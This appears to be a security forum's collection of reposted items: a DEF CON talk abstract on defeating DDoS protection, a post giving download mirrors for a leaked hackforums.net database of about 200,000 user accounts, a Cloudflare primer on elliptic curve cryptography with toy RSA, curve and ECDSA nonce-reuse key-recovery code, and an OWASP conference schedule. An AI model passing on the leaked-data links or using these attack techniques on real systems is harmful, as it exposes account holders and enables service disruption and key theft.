• Are Internet wiretapping you
• Break into your home network
• Perform 'Tailored Access Operations' (TAO) in your home
• Steal your encryption keys
• Can secretly plant anything they like on your computer
• Can secretly steal anything they like from your computer
• How to STOP this Computer Network Exploitation

Download: http://cryptome.org/2013/12/Full-Disclosure.pdf
15. Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation!

Description: With the advent of paid DDoS protection in the forms of CleanPipe, CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors... or so they think! We're here to rip apart this false sense of security by dissecting each and every mitigation technique you can buy today, showing you in clinical detail how exactly they work and how they can be defeated. Essentially we developed a 3-fold attack methodology: stay just below red-flag rate thresholds, make our attack traffic look inconspicuous, and emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges, ??? PROFIT! We will explain all the required look-innocent headers, TCP / HTTP challenge-response handshakes, JS auth bypass, etc. etc. in meticulous detail. With that knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All" will then be introduced as a platform to put what you've learned into practice, empowering you to bypass all DDoS mitigation layers and get straight through to the backend where havoc could be wrought. Oh and for the skeptics among you, we'll be showing testing results against specific products and services. As a battle-hardened veteran in the DDoS battlefield, Tony "MT" Miu has garnered invaluable experience and secrets of the trade, making him a distinguished thought leader in DDoS mitigation technologies. At Nexusguard, day in day out he deals with high-profile mission-critical clients, architecting for them full-scale DDoS mitigation solutions where failure is not an option. He has presented at DEF CON 20 and AVTokyo 2012 a talk titled "DDoS Black and White Kungfu Revealed", and at the 6th Annual HTCIA Asia-Pacific Conference a workshop titled "Network Attack Investigation". With "Impossible is Nothing" as his motto, Dr. Lee never fails to impress with his ingenious implementation prowess.
With years of SOC experience under his belt, systematic security engineering and process optimization are his specialties. As a testament to his versatility, Dr. Lee has previously presented at conferences across various disciplines including ACM VRCIA, ACM VRST, IEEE ICECS and IEEE ECCTD.

For more information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Sursa: Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation!
  16. Offensive Security Bug Bounty Program
  17. [h=3]hackforums.net - 190.000+ Accounts Leaked! #AntiSec[/h] www.hackforums.net - DOWNLOAD (110MB UNZIPPED) - Mirror1: http://inventati.org/anonhacknews/leak/Hackforums.net%20%28200k%20users%29.sql Mirror2: https://anonfiles.com/file/03e4cac3df6eb30ba9640c00474bc64a Mirror3: http://bayfiles.net/file/11Nrt/8zK5wI/Hackforums.net_%28200k_users%29.zip Enjoy. Posted by AnonHackNews Sursa: AnonHackNews Blog: hackforums.net - 190.000+ Accounts Leaked! #AntiSec
18. A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography

Published on October 24, 2013 05:00AM by Nick Sullivan.

Elliptic Curve Cryptography (ECC) is one of the most powerful but least understood types of cryptography in wide use today. At CloudFlare, we make extensive use of ECC to secure everything from our customers' HTTPS connections to how we pass data between our data centers. Fundamentally, we believe it's important to be able to understand the technology behind any security system in order to trust it. To that end, we looked around to find a good, relatively easy-to-understand primer on ECC in order to share with our users. Finding none, we decided to write one ourselves. That is what follows. Be warned: this is a complicated subject and it's not possible to boil down to a pithy blog post. In other words, settle in for a bit of an epic because there's a lot to cover. If you just want the gist, the TL;DR is: ECC is the next generation of public key cryptography and, based on currently understood mathematics, provides a significantly more secure foundation than first generation public key cryptography systems like RSA. If you're worried about ensuring the highest level of security while maintaining performance, ECC makes sense to adopt. If you're interested in the details, read on.

The dawn of public key cryptography

The history of cryptography can be split into two eras: the classical era and the modern era. The turning point between the two occurred in 1977, when both the RSA algorithm and the Diffie-Hellman key exchange algorithm were introduced. These new algorithms were revolutionary because they represented the first viable cryptographic schemes where security was based on the theory of numbers; they were the first to enable secure communication between two parties without a shared secret.
Cryptography went from being about securely transporting secret codebooks around the world to being able to have provably secure communication between any two parties without worrying about someone listening in on the key exchange.

Whitfield Diffie and Martin Hellman

Modern cryptography is founded on the idea that the key that you use to encrypt your data can be made public while the key that is used to decrypt your data can be kept private. As such, these systems are known as public key cryptographic systems. The first, and still most widely used of these systems, is known as RSA — named after the initials of the three men who first publicly described the algorithm: Ron Rivest, Adi Shamir and Leonard Adleman. What you need for a public key cryptographic system to work is a set of algorithms that is easy to process in one direction, but difficult to undo. In the case of RSA, the easy algorithm multiplies two prime numbers. If multiplication is the easy algorithm, its difficult pair algorithm is factoring the product of the multiplication into its two component primes. Algorithms that have this characteristic — easy in one direction, hard the other — are known as Trapdoor Functions. Finding a good Trapdoor Function is critical to making a secure public key cryptographic system. Simplistically: the bigger the spread between the difficulty of going one direction in a Trapdoor Function and going the other, the more secure a cryptographic system based on it will be.

A toy RSA algorithm

The RSA algorithm is the most popular and best understood public key cryptography system. Its security relies on the fact that factoring is slow and multiplication is fast. What follows is a quick walk-through of what a small RSA system looks like and how it works. In general, a public key encryption system has two components, a public key and a private key. Encryption works by taking a message and applying a mathematical operation to it to get a random-looking number.
Decryption takes the random-looking number and applies a different operation to get back to the original number. Encryption with the public key can only be undone by decrypting with the private key. Computers don't do well with arbitrarily large numbers. We can make sure that the numbers we are dealing with do not get too large by choosing a maximum number and only dealing with numbers less than the maximum. We can treat the numbers like the numbers on an analog clock. Any calculation that results in a number larger than the maximum gets wrapped around to a number in the valid range. In RSA, this maximum value (call it max) is obtained by multiplying two random prime numbers. The public and private keys are two specially chosen numbers that are greater than zero and less than the maximum value, call them pub and priv. To encrypt a number you multiply it by itself pub times, making sure to wrap around when you hit the maximum. To decrypt a message, you multiply it by itself priv times and you get back to the original number. It sounds surprising, but it actually works. This property was a big breakthrough when it was discovered. To create an RSA key pair, first randomly pick the two prime numbers to obtain the maximum (max). Then pick a number to be the public key pub. As long as you know the two prime numbers, you can compute a corresponding private key priv from this public key. This is how factoring relates to breaking RSA — factoring the maximum number into its component primes allows you to compute someone's private key from the public key and decrypt their private messages. Let's make this more concrete with an example. Take the prime numbers 13 and 7; their product gives us our maximum value of 91. Let's take our public encryption key to be the number 5. Then using the fact that we know 7 and 13 are the factors of 91 and applying an algorithm called the Extended Euclidean Algorithm, we get that the private key is the number 29.
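As an aside, this key setup can be reproduced in a few lines of Python; this is only a sketch of the toy example above (the variable names are ours), and pow(e, -1, m), which performs the Extended Euclidean step, requires Python 3.8+:

```python
# Toy RSA key setup from the text: primes 7 and 13, public exponent 5.
p, q = 7, 13
max_val = p * q              # 91, the wrap-around maximum
phi = (p - 1) * (q - 1)      # 72, used to invert the public exponent
pub = 5
priv = pow(pub, -1, phi)     # modular inverse of 5 mod 72
print(max_val, pub, priv)    # 91 5 29
```

Note that forming phi requires knowing the two primes, which is exactly why factoring max breaks the system.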
These parameters (max: 91, pub: 5, priv: 29) define a fully functional RSA system. You can take a number and multiply it by itself 5 times to encrypt it, then take that number and multiply it by itself 29 times and you get the original number back. Let's use these values to encrypt the message "CLOUD". In order to represent a message mathematically we have to turn the letters into numbers. A common representation of the Latin alphabet is UTF-8. Each character corresponds to a number. Under this encoding, CLOUD is 67, 76, 79, 85, 68. Each of these digits is smaller than our maximum of 91, so we can encrypt them individually. Let's start with the first letter. We have to multiply it by itself 5 times to get the encrypted value.

67×67 = 4489 = 30*
30×67 = 2010 = 8
8×67 = 536 = 81
81×67 = 5427 = 58

*Since 4489 is larger than max, we have to wrap it around. We do that by dividing by 91 and taking the remainder: 4489 = 91×41 + 30.

This means the encrypted version of 67 is 58. Repeating the process for each of the letters, we get that the encrypted message CLOUD becomes: 58, 20, 53, 50, 87. To decrypt this scrambled message, we take each number and multiply it by itself 29 times:

58×58 = 3364 = 88 (remember, we wrap around when the number is greater than max)
88×58 = 5104 = 8
…
9×58 = 522 = 67

Voila, we're back to 67. This works with the rest of the digits, resulting in the original message. The takeaway is that you can take a number, multiply it by itself a number of times to get a random-looking number, then multiply that number by itself a secret number of times to get back to the original number.

Not a perfect Trapdoor

RSA and Diffie-Hellman were so powerful because they came with rigorous security proofs. The authors proved that breaking the system is equivalent to solving a mathematical problem that is thought to be difficult to solve. Factoring is a very well known problem and has been studied since antiquity (see Sieve of Eratosthenes).
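Stepping back to the worked example for a moment: the "multiply by itself and wrap around" procedure is modular exponentiation, which Python exposes directly as three-argument pow. A short sketch (variable names are ours) reproducing the "CLOUD" round trip:

```python
# Encrypt and decrypt "CLOUD" with the toy parameters from the text:
# max = 91, pub = 5, priv = 29.
max_val, pub, priv = 91, 5, 29
msg = [ord(c) for c in "CLOUD"]             # [67, 76, 79, 85, 68]
enc = [pow(m, pub, max_val) for m in msg]   # multiply by itself 5 times, wrapping
dec = [pow(c, priv, max_val) for c in enc]  # multiply by itself 29 times, wrapping
print(enc)                                  # [58, 20, 53, 50, 87]
print("".join(chr(d) for d in dec))         # CLOUD
```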
Any breakthroughs would be big news and would net the discoverer a significant financial windfall.

"Find factors, get money" - Notorious T.K.G. (Reuters)

That said, factoring is not the hardest problem on a bit for bit basis. Specialized algorithms like the Quadratic Sieve and the General Number Field Sieve were created to tackle the problem of prime factorization and have been moderately successful. These algorithms are faster and less computationally intensive than the naive approach of just guessing pairs of known primes. These factoring algorithms get more efficient as the size of the numbers being factored gets larger. The gap between the difficulty of factoring large numbers and multiplying large numbers is shrinking as the number (i.e. the key's bit length) gets larger. As the resources available to decrypt numbers increase, the size of the keys needs to grow even faster. This is not a sustainable situation for mobile and low-powered devices that have limited computational power. The gap between factoring and multiplying is not sustainable in the long term. All this means is that RSA is not the ideal system for the future of cryptography. In an ideal Trapdoor Function, the easy way and the hard way get harder at the same rate with respect to the size of the numbers in question. We need a public key system based on a better Trapdoor.

Elliptic curves: Building blocks of a better Trapdoor

After the introduction of RSA and Diffie-Hellman, researchers explored other mathematics-based cryptographic solutions looking for other algorithms beyond factoring that would serve as good Trapdoor Functions. In 1985, cryptographic algorithms were proposed based on an esoteric branch of mathematics called elliptic curves. But what exactly is an elliptic curve and how does the underlying Trapdoor Function work? Unfortunately, unlike factoring — something we all had to do for the first time in middle school — most people aren't as familiar with the math around elliptic curves.
The math isn't as simple, nor is explaining it, but I'm going to give it a go over the next few sections. (If your eyes start to glaze over, you can skip way down to the section: What does it all mean.) An elliptic curve is the set of points that satisfy a specific mathematical equation. The equation for an elliptic curve looks something like this:

y² = x³ + ax + b

That graphs to something that looks a bit like the Lululemon logo tipped on its side: There are other representations of elliptic curves, but technically an elliptic curve is the set of points satisfying an equation in two variables with degree two in one of the variables and three in the other. An elliptic curve is not just a pretty picture, it also has some properties that make it a good setting for cryptography.

Strange symmetry

Take a closer look at the elliptic curve plotted above. It has several interesting properties. One of these is horizontal symmetry. Any point on the curve can be reflected over the x axis and remain the same curve. A more interesting property is that any non-vertical line will intersect the curve in at most three places. Let's imagine this curve as the setting for a bizarre game of billiards. Take any two points on the curve and draw a line through them; it will intersect the curve at exactly one more place. In this game of billiards, you take a ball at point A and shoot it towards point B. When it hits the curve, the ball bounces either straight up (if it's below the x-axis) or straight down (if it's above the x-axis) to the other side of the curve. We can call this billiards move on two points "dot." Any two points on a curve can be dotted together to get a new point.

A dot B = C

We can also string moves together to "dot" a point with itself over and over.

A dot A = B
A dot B = C
A dot C = D
...
It turns out that if you have two points, an initial point "dotted" with itself n times to arrive at a final point, finding out n when you only know the final point and the first point is hard. To continue our bizarro billiards metaphor, imagine one person plays our game alone in a room for a random period of time. It is easy for him to hit the ball over and over following the rules described above. If someone walks into the room later and sees where the ball has ended up, even if they know all the rules of the game and where the ball started, they cannot determine the number of times the ball was struck to get there without running through the whole game again until the ball gets to the same point. Easy to do, hard to undo: this is the basis for a very good Trapdoor Function.

Let's get weird

This simplified curve above is great to look at and explain the general concept of elliptic curves, but it doesn't represent what the curves used for cryptography look like. For this, we have to restrict ourselves to numbers in a fixed range, like in RSA. Rather than allow any value for the points on the curve, we restrict ourselves to whole numbers in a fixed range. When computing the formula for the elliptic curve (y² = x³ + ax + b), we use the same trick of rolling over numbers when we hit the maximum. If we pick the maximum to be a prime number, the elliptic curve is called a prime curve and has excellent cryptographic properties. Here's an example of a curve (y² = x³ - x + 1) plotted for all numbers: Here's the plot of the same curve with only the whole number points represented with a maximum of 97: This hardly looks like a curve in the traditional sense, but it is. It's like the original curve was wrapped around at the edges and only the parts of the curve that hit whole number coordinates are colored in. You can even still see the horizontal symmetry. In fact, you can still play the billiards game on this curve and dot points together.
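The "dot" operation on that mod-97 curve can be written out concretely. The sketch below uses the standard chord-and-tangent formulas and deliberately skips the edge cases (the identity point and vertical lines); the starting point (0, 1) is our own choice of a point on the curve, and pow(x, -1, p) needs Python 3.8+:

```python
# Point addition ("dot") on y^2 = x^3 - x + 1 over the integers mod 97,
# the prime curve described in the text.
p, a, b = 97, -1, 1

def dot(P, Q):
    if P == Q:  # tangent line: doubling a point
        s = (3 * P[0] ** 2 + a) * pow(2 * P[1], -1, p) % p
    else:       # chord through two distinct points
        s = (Q[1] - P[1]) * pow(Q[0] - P[0], -1, p) % p
    x = (s * s - P[0] - Q[0]) % p
    y = (s * (P[0] - x) - P[1]) % p  # reflect the third intersection over the x-axis
    return (x, y)

def on_curve(P):
    return (P[1] ** 2 - (P[0] ** 3 + a * P[0] + b)) % p == 0

G = (0, 1)          # on the curve, since 1^2 = 0^3 - 0 + 1
G2 = dot(G, G)      # G dot G
G3 = dot(G2, G)     # (G dot G) dot G
print(G2, G3, on_curve(G2) and on_curve(G3))
```

Dotting a point with itself n times like this is fast; recovering n from the start and end points is the hard direction described next.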
The equation for a line on the curve still has the same properties. Moreover, the dot operation can be efficiently computed. You can visualize the line between two points as a line that wraps around at the borders until it hits a point. It's as if in our bizarro billiards game, when a ball hits the edge of the board (the max) then it is magically transported to the opposite side of the table and continues on its path until reaching a point, kind of like the game Asteroids. With this new curve representation, you can take messages and represent them as points on the curve. You could imagine taking a message and setting it as the x coordinate, and solving for y to get a point on the curve. It is slightly more complicated than this in practice, but this is the general idea.

You get the points (70,6), (76,48), -, (82,6), (69,22)*

*There are no coordinates with 65 for the x value; this can be avoided in the real world.

An elliptic curve cryptosystem can be defined by picking a prime number as a maximum, a curve equation and a public point on the curve. A private key is a number priv, and a public key is the public point dotted with itself priv times. Computing the private key from the public key in this kind of cryptosystem is called the elliptic curve discrete logarithm function. This turns out to be the Trapdoor Function we were looking for.

What does it all mean?

The elliptic curve discrete logarithm is the hard problem underpinning elliptic curve cryptography. Despite almost three decades of research, mathematicians still haven't found an algorithm to solve this problem that improves upon the naive approach. In other words, unlike with factoring, based on currently understood mathematics there doesn't appear to be a shortcut that is narrowing the gap in a Trapdoor Function based around this problem. This means that for numbers of the same size, solving elliptic curve discrete logarithms is significantly harder than factoring.
Since a more computationally intensive hard problem means a stronger cryptographic system, it follows that elliptic curve cryptosystems are harder to break than RSA and Diffie-Hellman. To visualize how much harder it is to break, Lenstra recently introduced the concept of "Global Security." You can compute how much energy is needed to break a cryptographic algorithm, and compare that with how much water that energy could boil. This is a kind of cryptographic carbon footprint. By this measure, breaking a 228-bit RSA key requires less energy than it takes to boil a teaspoon of water. Comparatively, breaking a 228-bit elliptic curve key requires enough energy to boil all the water on earth. For this level of security with RSA, you'd need a 2,380-bit key. With ECC, you can use smaller keys to get the same levels of security. Small keys are important, especially in a world where more and more cryptography is done on less powerful devices like mobile phones. While multiplying two prime numbers together is easier than factoring the product into its component parts, when the prime numbers start to get very long even just the multiplication step can take some time on a low powered device. While you could likely continue to keep RSA secure by increasing the key length, that comes at the cost of slower cryptographic performance on the client. ECC appears to offer a better tradeoff: high security with short, fast keys.

Elliptic curves in action

After a slow start, elliptic curve based algorithms are gaining popularity and the pace of adoption is accelerating. Elliptic curve cryptography is now used in a wide variety of applications: the U.S.
government uses it to protect internal communications, the Tor project uses it to help assure anonymity, it is the mechanism used to prove ownership of bitcoins, it provides signatures in Apple's iMessage service, it is used to encrypt DNS information with DNSCurve, and it is the preferred method for authentication for secure web browsing over SSL/TLS. CloudFlare uses elliptic curve cryptography to provide perfect forward secrecy, which is essential for online privacy. First generation cryptographic algorithms like RSA and Diffie-Hellman are still the norm in most arenas, but elliptic curve cryptography is quickly becoming the go-to solution for privacy and security online. If you are accessing the HTTPS version of this blog (https://blog.cloudflare.com) from a recent enough version of Chrome or Firefox, your browser is using elliptic curve cryptography. You can check this yourself. In Chrome, you can click on the lock in the address bar and go to the connection tab to see which cryptographic algorithms were used in establishing the secure connection. Clicking on the lock in Chrome 30 should show the following image. The relevant portion of this text for this discussion is ECDHE_RSA. ECDHE stands for Elliptic Curve Diffie Hellman Ephemeral and is a key exchange mechanism based on elliptic curves. This algorithm is used by CloudFlare to provide perfect forward secrecy in SSL. The RSA component means that RSA is used to prove the identity of the server. We use RSA because CloudFlare's SSL certificate is bound to an RSA key pair. Modern browsers also support certificates based on elliptic curves. If CloudFlare's SSL certificate were an elliptic curve certificate, this part of the page would state ECDHE_ECDSA. The proof of the identity of the server would be done using ECDSA, the Elliptic Curve Digital Signature Algorithm.
CloudFlare's ECC curve for ECDHE (this is the same curve used by Google.com):

max: 115792089210356248762697446949407573530086143415290314195533631308867097853951
curve: y² = x³ + ax + b
a = 115792089210356248762697446949407573530086143415290314195533631308867097853948
b = 41058363725152142129326129780047268409114441015993725554835256314039467401291

The performance improvement of ECDSA over RSA is dramatic. Even with an older version of OpenSSL that does not have assembly-optimized elliptic curve code, an ECDSA signature with a 256-bit key is over 20x faster than an RSA signature with a 2,048-bit key. On a MacBook Pro with OpenSSL 0.9.8, the "speed" benchmark returns:

Doing 256 bit sign ecdsa's for 10s: 42874 256 bit ECDSA signs in 9.99s
Doing 2048 bit private rsa's for 10s: 1864 2048 bit private RSA's in 9.99s

That's 23x as many signatures using ECDSA as RSA. CloudFlare is constantly looking to improve SSL performance. Just this week, CloudFlare started using an assembly-optimized version of ECC that more than doubles the speed of ECDHE. Using elliptic curve cryptography saves time, power and computational resources for both the server and the browser helping us make the web both faster and more secure.

The downside

It is not all roses in the world of elliptic curves; there have been some questions and uncertainties that have held them back from being fully embraced by everyone in the industry. One point that has been in the news recently is the Dual Elliptic Curve Deterministic Random Bit Generator (Dual_EC_DRBG). This is a random number generator standardized by the National Institute of Standards and Technology (NIST), and promoted by the NSA. Dual_EC_DRBG generates random-looking numbers using the mathematics of elliptic curves. The algorithm itself involves taking points on a curve and repeatedly performing an elliptic curve "dot" operation.
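As an aside (our observation, not from the post): the max quoted above is the NIST P-256 prime, which has a special binary form chosen for fast modular reduction, and a is simply max - 3. A quick sketch verifies both directly from the quoted values:

```python
# Sanity-check the structure of the ECDHE curve parameters quoted above.
max_val = 115792089210356248762697446949407573530086143415290314195533631308867097853951
a = 115792089210356248762697446949407573530086143415290314195533631308867097853948

# The modulus is the P-256 prime 2^256 - 2^224 + 2^192 + 2^96 - 1,
# and the curve coefficient a is congruent to -3 mod max.
print(max_val == 2**256 - 2**224 + 2**192 + 2**96 - 1)  # True
print(a == max_val - 3)                                  # True
```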
After publication it was reported that it could have been designed with a backdoor, meaning that the sequence of numbers returned could be fully predicted by someone with the right secret number. Recently, the company RSA recalled several of their products because this random number generator was set as the default PRNG for their line of security products. Whether or not this random number generator was written with a backdoor does not change the strength of the elliptic curve technology itself, but it does raise questions about the standardization process for elliptic curves. As we've written about before, it's also part of the reason that attention should be paid to ensuring that your system is using adequately random numbers. In a future blog post, we will go into how a backdoor could be snuck into the specification of this algorithm. Some of the more skeptical cryptographers in the world now have a general distrust for NIST itself and the standards it has published that were supported by the NSA. Almost all of the widely implemented elliptic curves fall into this category. There are no known attacks on these special curves, chosen for their efficient arithmetic; however, bad curves do exist and some feel it is better to be safe than sorry. There has been progress in developing curves with efficient arithmetic outside of NIST, including curve 25519 created by Daniel Bernstein (djb) and more recently computed curves by Paulo Barreto and collaborators, though widespread adoption of these curves is several years away. Until these non-traditional curves are implemented by browsers, they won't be able to be used for securing cryptographic transport on the web. Another uncertainty about elliptic curve cryptography is related to patents. There are over 130 patents that cover specific uses of elliptic curves owned by BlackBerry (through their 2009 acquisition of Certicom). Many of these patents were licensed for use by private organizations and even the NSA.
This has given some developers pause over whether their implementations of ECC infringe upon this patent portfolio. In 2007, Certicom filed suit against Sony for some uses of elliptic curves; however, that lawsuit was dismissed in 2009. There are now many implementations of elliptic curve cryptography that are thought not to infringe upon these patents and are in wide use.

The ECDSA digital signature has a drawback compared to RSA in that it requires a good source of entropy. Without proper randomness, the private key could be revealed. A flaw in the random number generator on Android allowed hackers to find the ECDSA private key used to protect the bitcoin wallets of several people in early 2013. Sony's PlayStation implementation of ECDSA had a similar vulnerability. A good source of random numbers is needed on the machine making the signatures. Dual_EC_DRBG is not recommended.

Looking ahead

Even with the above cautions, the advantages of elliptic curve cryptography over traditional RSA are widely accepted. Many experts are concerned that the mathematical algorithms behind RSA and Diffie-Hellman could be broken within 5 years, leaving ECC as the only reasonable alternative.

Elliptic curves are supported by all modern browsers, and most certification authorities offer elliptic curve certificates. Every SSL connection for a CloudFlare-protected site will default to ECC on a modern browser. Soon, CloudFlare will allow customers to upload their own elliptic curve certificates. This will allow ECC to be used for identity verification as well as securing the underlying message, speeding up HTTPS sessions across the board. More on this when the feature becomes available.

Sursa: A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography | CloudFlare Blog
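The entropy failures mentioned in the post (the Android wallet thefts, Sony's PlayStation signing key) boil down to nonce reuse, and the key-recovery algebra is short enough to sketch. All the values below are made up for illustration: n is the real P-256 group order, but d, k and r are toy numbers and r does not come from an actual curve point, so this demonstrates only the modular arithmetic, not real curve operations:

```ruby
# ECDSA over a group of prime order n produces signatures (r, s) with
#   s = k^-1 * (h + r*d) mod n
# where d is the private key, k the per-signature nonce, h the message hash.
# If the same k (and hence the same r) appears in two signatures, both k and
# d fall out with two modular inversions (computed here via Fermat, n prime).
n  = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551 # P-256 order
d  = 0x1d2e3f4a5b6c7d8e9f # "secret" signing key (made up)
k  = 0x0badc0ffee0ddf00d  # the repeated nonce (made up)
r  = 0x42424242deadbeef   # stands in for (k*G).x mod n; not a real curve point
h1 = 0x1111aaaa
h2 = 0x2222bbbb

k_inv = k.pow(n - 2, n)
s1 = ((h1 + r * d) * k_inv) % n
s2 = ((h2 + r * d) * k_inv) % n

# The attacker sees only (r, s1, h1) and (r, s2, h2) and recovers everything:
k_rec = (((h1 - h2) % n) * ((s1 - s2) % n).pow(n - 2, n)) % n
d_rec = (((s1 * k_rec - h1) % n) * r.pow(n - 2, n)) % n

puts d_rec == d # => true
```

Anyone holding two signatures that share r can run the same two lines, which is why a broken RNG is fatal to ECDSA in a way it is not to RSA signing.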
  19. AppSec USA 2013 - Presentations

[h=2]NOVEMBER 20 • WEDNESDAY[/h]

8:30AM – 8:50AM Welcome to OWASP AppSecUSA – Updates Speakers: Tom Brennan, Peter Dean, Israel Bryski
9:00AM – 9:50AM Keynote: Computer and Network Security: I Think We Can Win! Speakers: William Cheswick
10:00AM – 10:50AM Hardening Windows 8 apps for the Windows Store Speakers: Bill Sempf
10:00AM – 10:50AM The Perilous Future of Browser Security Speakers: Robert Hansen
10:00AM – 10:50AM Automation Domination Speakers: Brandon Spruth
10:00AM – 10:50AM How To Stand Up an AppSec Program – Lessons from the Trenches Speakers: Joe Friedman
10:00AM – 10:50AM PANEL: Aim-Ready-Fire Moderator: Wendy Nather Speakers: Ajoy Kumar, Pravir Chandra, Suprotik Ghose, Jason Rothhaupt, Ramin Safai, Sean Barnum
10:00AM – 10:50AM Project Talk: Project Leader Workshop Speakers: Samantha Groves
11:00AM – 11:50AM From the Trenches: Real-World Agile SDLC Speakers: Chris Eng
11:00AM – 11:50AM Securing Cyber-Physical Application Software Speakers: Warren Axelrod
11:00AM – 11:50AM Why is SCADA Security an Uphill Battle? Speakers: Amol Sarwate
11:00AM – 11:50AM Computer Crime Laws Speakers: Tor Ekeland, Attorney
11:00AM – 11:50AM Can AppSec Training Really Make a Smarter Developer? Speakers: John Dickson
11:00AM – 11:50AM Project Talk: OWASP Enterprise Security API Project Speakers: Chris Schmidt, Kevin Wall
12:00PM – 12:50PM All the network is a stage, and the APKs merely players: Scripting Android Applications Speakers: Daniel Peck
12:00PM – 12:50PM BASHing iOS Applications: dirty, s*xy, cmdline tools for mobile auditors Speakers: Jason Haddix, Dawn Isabel
12:00PM – 12:50PM Case Study: 10 Steps to Agile Development without Compromising Enterprise Security Speakers: Yair Rovek
12:00PM – 12:50PM Build but don’t break: Lessons in Implementing HTTP Security Headers Speakers: Kenneth Lee
12:00PM – 12:50PM The Cavalry Is Us: Protecting the public good Speakers: Josh Corman, Nicholas J. Percoco
1:00PM – 1:50PM Mantra OS: Because The World is Cruel Speakers: Greg Disney-Leugers
1:00PM – 1:50PM Open Mic – Birds of a Feather –> Cavalry Speakers: Josh Corman, Nicholas J. Percoco
1:00PM – 1:50PM HTML5: Risky Business or Hidden Security Tool Chest? Speakers: Johannes Ullrich
1:00PM – 1:50PM A Framework for Android Security through Automation in Virtual Environments Speakers: Parth Patel
1:00PM – 1:50PM 2013 AppSec Guide and CISO Survey: Making OWASP Visible to CISOs Speakers: Marco Morana, Tobias Gondrom
1:00PM – 1:50PM PANEL: Privacy or Security: Can We Have Both? Moderators: Jeff Fox Speakers: Jim Manico, James Elste, Jack Radigan, Amy Neustein, Joseph Concannon, Steven Rambam
1:00PM – 1:50PM Project Talk: OWASP OpenSAMM Project Speakers: Seba Deleersnyder, Pravir Chandra
2:00PM – 2:50PM Javascript libraries (in)security: A showcase of reckless uses and unwitting misuses Speakers: Stefano Di Paola
2:00PM – 2:50PM Revenge of the Geeks: Hacking Fantasy Sports Sites Speakers: Dan Kuykendall
2:00PM – 2:50PM What You Didn’t Know About XML External Entities Attacks Speakers: Timothy Morgan
2:00PM – 2:50PM Open Mic: Making the CWE Approachable for AppSec Newcomers Speakers: Hassan Radwan
2:00PM – 2:50PM “What Could Possibly Go Wrong?” – Thinking Differently About Security Speakers: Mary Ann Davidson
2:00PM – 2:50PM PANEL: Cybersecurity and Media: All the News That’s Fit to Protect? Moderators: Dylan Tweney Speakers: Rajiv Pant, Gordon Platt, Space Rogue, Michael Carbone, Nico Sell
2:00PM – 2:50PM Project Talk: The OWASP Education Projects Speakers: Konstantinos Papapanagiotou, Martin Knobloch
3:00PM – 3:50PM Advanced Mobile Application Code Review Techniques Speakers: sreenarayan a
3:00PM – 3:50PM OWASP Zed Attack Proxy Speakers: Simon Bennetts
3:00PM – 3:50PM Open Mic: FERPAcolypse NOW! – Lessons Learned from an inBloom Assessment Speakers: Mark Major
3:00PM – 3:50PM Pushing CSP to PROD: Case Study of a Real-World Content-Security Policy Implementation Speakers: Brian Holyfield, Erik Larsson
3:00PM – 3:50PM Making the Future Secure with Java Speakers: Milton Smith
3:00PM – 3:50PM PANEL: Mobile Security 2.0: Beyond BYOD Moderators: Stephen Wellman Speakers: Devindra Hardawar, Daniel Miessler, Jason Rouse
3:00PM – 3:50PM Project Talk: OWASP AppSensor Project Speakers: John Melton, Dennis Groves
4:00PM – 4:50PM OWASP Top Ten Proactive Controls Speakers: Jim Manico
4:00PM – 4:50PM Open Mic: Struts Ognl – Vulnerabilities Discovery and Remediation Speakers: Eric Kobrin
4:00PM – 4:50PM Big Data Intelligence (Harnessing Petabytes of WAF statistics to Analyze & Improve Web Protection in the Cloud) Speakers: Ory Segal, Tsvika Klein
4:00PM – 4:50PM Forensic Investigations of Web Exploitations Speakers: Ondrej Krehel
4:00PM – 4:50PM Sandboxing JavaScript via Libraries and Wrappers Speakers: Phu Phung
4:00PM – 4:50PM Tagging Your Code with a Useful Assurance Label Speakers: Robert Martin, Sean Barnum

[h=2]NOVEMBER 21 • THURSDAY[/h]

9:00AM – 9:50AM ‘) UNION SELECT `This_Talk` AS (‘New Exploitation and Obfuscation Techniques’)%00 Speakers: Roberto Salgado
9:00AM – 9:50AM Defeating XSS and XSRF using JSF Based Frameworks Speakers: Steve Wolf
9:00AM – 9:50AM Contain Yourself: Building Secure Containers for Mobile Devices Speakers: Ronald Gutierrez
9:00AM – 9:50AM Mobile app analysis with Santoku Linux Speakers: Hoog Andrew
9:00AM – 9:50AM AppSec at DevOps Speed and Portfolio Scale Speakers: Jeff Williams
9:00AM – 10:00AM OWN THE CON: How we organized AppSecUSA – come learn how you can do it too Speakers: Tom Brennan, Sarah Baso, Peter Dean, Israel Bryski
10:00AM – 10:50AM Open Mic: OpenStack Swift – Cloud Security Speakers: Rodney Beede
10:00AM – 10:50AM iOS Application Defense – iMAS Speakers: Gregg Ganley
10:00AM – 10:50AM PiOSoned POS – A Case Study in iOS based Mobile Point-of-Sale gone wrong Speakers: Mike Park
10:00AM – 10:50AM Accidental Abyss: Data Leakage on The Internet Speakers: Kelly FitzGerald
10:00AM – 10:50AM Leveraging OWASP in Open Source Projects – CAS AppSec Working Group Speakers: Bill Thompson, Aaron Weaver, David Ohsie
10:00AM – 11:50AM Project Talk and Training: OWASP O2 Platform Speakers: Dinis Cruz
11:00AM – 11:50AM OWASP Hackademic: a practical environment for teaching application security Speakers: Konstantinos Papapanagiotou
11:00AM – 11:50AM An Introduction to the Newest Addition to the OWASP Top 10. Experts Break-Down the New Guideline and Offer Guidance on Good Component Practice Speakers: Ryan Berg
11:00AM – 11:50AM Verify your software for security bugs Speakers: Simon Roses Femerling
11:00AM – 11:50AM Open Mic: Password Breaches – Why They Impact Your App Security When Other WebApps Are Breached Speakers: Michael Coates
11:00AM – 11:50AM The State Of Website Security And The Truth About Accountability and “Best-Practices”, Full Report Speakers: Jeremiah Grossman
12:00PM – 12:50PM Open Mic: What Makes OWASP Japan Special Speakers: Riotaro OKADA
12:00PM – 12:50PM Insecure Expectations Speakers: Matt Konda
12:00PM – 12:50PM OWASP Periodic Table of Vulnerabilities Speakers: James Landis
12:00PM – 12:50PM Application Security: Everything we know is wrong Speakers: Eoin Keary
